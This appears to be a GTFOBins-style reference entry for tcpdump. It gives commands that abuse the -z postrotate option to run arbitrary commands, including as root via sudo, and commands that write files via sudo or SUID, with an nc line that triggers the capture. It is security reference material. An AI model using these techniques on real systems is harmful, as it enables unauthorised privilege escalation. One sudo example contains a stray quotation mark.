.. / tcpdump

Sponsor Fork Star

• Command
• File write

Command

This executable can run non-interactive system commands.

• Version requirements

  In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the postrotate-command to a small subset of predefined commands thus preventing the execution of the following.

  Comment

  This requires some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.

  Unprivileged

  This function can be performed by any unprivileged user.

  echo /path/to/command >/path/to/temp-file
  chmod +x /path/to/temp-file
  tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo /path/to/command" >/path/to/temp-file
  chmod +x /path/to/temp-file
  tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file -Z root

• Comment

  This require some traffic to be actually captured. Also note that the command-argument string is both passed to the command and written as file, hence some restrictions apply.

  Unprivileged

  This function can be performed by any unprivileged user.

  tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command

File write

This executable can write data to local files.

• Comment

  This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:

  nc -u localhost 1 <<<DATA
  

  While user is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.

  Unprivileged

  This function can be performed by any unprivileged user.

  tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user

Source | History